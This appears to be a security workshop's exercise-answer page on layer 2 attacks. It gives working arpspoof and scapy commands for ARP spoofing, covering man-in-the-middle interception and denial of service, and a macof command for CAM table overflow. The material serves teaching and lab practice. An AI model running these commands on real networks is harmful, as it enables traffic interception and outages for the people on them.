Security Workshop #1 Layer 2 Security Part. 1
Introduction to layer 2 security, part 1.
– Layer 2 Switching – Sniffing tools – Exercise 0
– Attack 1: ARP spoofing – Exercise 1 – Counter 1
– Attack 2: CAM table overflow – Exercise 2 – Counter 2
Slides
Exercise/Answers
Exercise 1.1
## Set a static IP address (Debian)
ifconfig eth0 192.168.1.5 netmask 255.255.255.0 (not reboot persistent)
## or
nano /etc/interfaces
auto eth0
iface eth0 inet static
address 192.168.1.5
network 192.168.1.0
netmask 255.255.255.0
broadcast 192.168.1.255
## Activate routing
echo 1 > /proc/sys/net/ipv4/ip_forward (not reboot persistent)
## or
nano /etc/sysctl.conf
net.ipv4.ip_forward = 1
sysctl -p
## Send ARP request with arpspoof
arpspoof -i eth0 -t 192.168.1.2 192.168.1.3
arpspoof -i eth0 -t 192.168.1.3 192.168.1.2
## Observe with Wireshark or tcpdump
Exercise 1.2
## Victim's IP: 192.168.1.5
## Attacker's MAC: 11:11:11:11:11:11
## Victim's MAC: 22:22:22:22:22:22
## Gateway IP: 192.168.1.1
## Gateway MAC: 33:33:33:33:33:33
## Activate routing
echo 1 > /proc/sys/net/ipv4/ip_forward
## ARP messages sent to victim
target = ARP()
target.hwsrc="11:11:11:11:11:11"
target.psrc="192.168.1.1"
target.hwdst="22:22:22:22:22:22"
target.pdst="192.168.1.5"
target.display()
send(target, count=2000)
## ARP messages sent to the gateway
gw = ARP()
gw.hwsrc="11:11:11:11:11:11"
gw.psrc="192.168.1.5"
gw.hwdst="33:33:33:33:33:33"
gw.pdst="192.168.1.1"
gw.display()
send(gw, count=2000)
## Use Wireshark to wiretap
## On scapy, there is also a function arpcachepoison().
## http://samsclass.info/124/proj11/proj9x-106-arpspoof.html
## http://scapy-guide.googlecode.com/files/ScapyGuide.pdf
Exercise 1.3
## The answer is in arpspoof manpage
## -t target Specify a particular host to ARP poison (if not specified, all hosts on the LAN).
## http://www.irongeek.com/i.php?page=backtrack-3-man/arpspoof
## Send gratuitous ARP frames
arpspoof -i eth0 192.168.1.1
## The objective is a denial of service, so we do not route packets
echo 0 > /proc/sys/net/ipv4/ip_forward
Exercise 2.1
## Use macof
## Interface eth0, 8K requests
## http://www.irongeek.com/i.php?page=backtrack-3-man/macof
macof -i eth0 -n 8000
## We can also easily do a CAM table overflow with scapy.
The purpose of this article/presentation is informational only. The author is not and could not be held responsible for the readers’ behavior.